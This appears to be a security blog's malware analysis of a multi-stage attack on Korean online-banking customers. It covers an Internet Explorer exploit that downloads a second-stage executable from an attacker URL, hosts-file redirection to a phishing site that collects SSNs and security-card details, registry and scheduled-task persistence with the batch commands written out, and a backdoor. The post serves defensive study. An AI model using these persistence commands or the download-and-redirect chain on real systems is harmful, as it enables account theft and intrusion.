In this blog post, we will look at the attack originating from hxxp://www.spc.or.kr/ and targeting several major Korean banks.
The original website, rootadmin2012.com, contains the following three lines of code:
The first two items are iframes which contain heapspray and shellcodes, and the last script tag is a counter, which tells cybercriminals how many times the main attack page was executed.
After a brief examination of 1.html, we can notice a variable with the interesting name "shellcode"
which, after unquoting, gives us the following shellcode:
You can notice visible text strings inside - Urlmon, which is a windows library for internet communication; C:\x.exe, which is the name of file, in which downloaded contents is stored and later executed; and http://rootadmin2012.com/sun.exe, which contains another stage of attack.
After observing cc.html, we can notice another interesting strings:
This gives us a hunch that this exploit has something to do with Internet Explorer (ie), and heap spraying (heaplib). After further searching, we were able to determine that this attack uses the CVE-2012-1889 ( http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889 ) vulnerability, which allows a remote attacker via a crafted web site to execute arbitrary code. Search for classid=f6D90f11-9c73-11d3-b32e-00C04f990bb4 in both cc.html and following link at exploit database http://www.exploit-db.com/exploits/19186/.
It is important to note that this attack worked only on computers with disabled DEP ( data execution prevention ). If you run this attack on computer with enabled DEP, the following message is displayed
File sun.exe is the second stage downloader, size 15KB, written in Visual Basic. It has the same icon as Microsoft Word documents.
When it gets downloaded, it performs the following tasks:
1) Checks internet connection by downloading an image from naver.net, which is a Korean search engine
If (sizeOfFile("c:\ntldrs\Isinter.gif") > 0) Then
which is then appended to hosts file C:\WINDOWS\system32\drivers\etc\hosts. Anytime user accesses any of the above mentioned websites belonging to Korean banks, he/she gets redirected to 220.127.116.11 (softbank126114224053.bbtec.net), which is a server located in Japan.
3) Opens the following website in http://myadmin2012.com/tong.htm"
"C:\Program Files\Internet Explorer\IEXPLORE.EXE".
which is a script for another counter, which tells attackers, how many times the downloader was downloaded.
4) To make itself persistent ( in case of computer reboot, etc... )
it modifies Software\Microsoft\Windows\CurrentVersion\Run registry key by adding value with name "skunser" and data "C:\ntldrs\svchest.exe", where it previously copied itself.
stores it into tongji2.exe, and executes it. Tongji2 is a backdoor file which attempts to connect to another website controlled by cybercriminals.
6) It drops and executes the following batch file, which schedules the start of a downloader each 30 minutes. "At XX:XX /interactive" ensures, that svchest.exe is started with Local System privileges (on WinXP), which are higher than Administrator privileges.
schtasks /delete /tn * /f
sc config Schedule start= auto
net start "Task Scheduler"
At 0:00 /interactive c:/ntldrs/svchest.exe
At 0:30 /interactive c:/ntldrs/svchest.exe
At 1:00 /interactive c:/ntldrs/svchest.exe
At 1:30 /interactive c:/ntldrs/svchest.exe
At 24:30 /interactive c:/ntldrs/svchest.exe
The third stage of the attack is the main tongji2.exe module.
This module is an executable with a size of about 1.3M, written in Delphi, packed with Safengine. From dynamic analysis, we can observe, that after execution it injects itself into iexplore.exe to become less suspicious for untrained computer users. It then tries to initiate a connection via custom communication protocol. Received messages are decrypted by a simple xor loop. Then, depending on the contents of the received message, it chooses to execute one from many built-in functions, for example, download file, reboot computer, read clipboard, read registry, read system information and many others. We can classify this as backdoor trojan and infostrealer, which allows attackers to control the compromised computer. It also tries to connect to laoding521.eicp.net, port 889. eicp.net, free Chinese webhosting, which belongs to oray.com.
Let's have a look at consequences of modified hosts file. In a screenshot above, we show that the hosts file is modified in such a way that the IP address is followed by an URL address of a Korean bank. The same scenario occurs more than once - for several Korean banks. We will show you an example of Koonmin Bank ( KBStar ). In the screenshot below, you can see the original KBStar webpage. Notice the red oval in upper left corner. It shows http, http-secure, communication is encrypted and therefore all data entered and sent by the bank's customer is encrypted before being sent.
When we open the same webpage on an infected computer (with modified hosts file), it will show exactly the same page (visually), but the source code of the main webpage is now different. The user does not communicate with the bank's website, but with attacker's server. See the screenshot below. We can notice that string "onclick=otperror('')" repeated often in the fake site ( left ), normal links are displayed in the original site ( right ).
After user clicks on any link on the fake webpage, he/she is shown the following error message saying that the computer was infected by a virus and, for security reasons, he/she needs to fill in application for fraud prevention service.
After clicking the OK button, the user is redirected to the page, where he/she is asked for their name and social security number (SSN). When the format of entered SSN is correct, it redirects users to further forms asking for more customer details, including address, phone number, security card, and many more details.
Note the left upper corner. These forms are not encrypted, therefore all private customer information is being sent to attackers in unencrypted form. Cybercriminals then have all the victim's credentials and can plunder money from the victim's account.
Many Korean websites require a name and SSN for registration. There have been many SSN leaks, so some websites started moving to a IPIN (Internet Personal Identification Number), which is a secure replacement for name and SSN. However, IPIN is still not so popular so name and SSN are still valuable information. A similar situation is occurring with the Security Card, which is also an important part of Korean Internet banking. Without this card, customers can't issue a certificate for internet banking. A few years ago, many Korean banks started moving to OTP (One Time Password) dongle. However, many people are still using security cards, which is why cybercriminals want to steal them too. Korean internet banking might be more secure if all the customers used previously mentioned safer methods of authentication. Unfortunately, there are still many people using old and less secure methods of accessing their accounts.Cybercriminals know it and take advantage of it.
Both domains hosted in the following IP address in Japan:
The attack probably originates in China. Aside from location of the final (laoding521.eicp.net), which is in China, analysis of both 2nd and 3rd stage executable makes us think so. First of all, file names like tongji (statistics), tong (connect), pao (run) are definitely Chinese.
After decompiling the second stage downloader, we can find another Chinese words
Private Sub duquwenjian_Timer (wenjian = document, file)
Attribute VB_Name = "hei" (hei = hack)
Public Sub chuangjian (chuangjian = find, establish)
Public Sub wanbi (wanbi = finish, end, complete)
The 3rd stage is protected with Safengine, a Chinese executable protector, which is typically not seen with malware coming from other countries.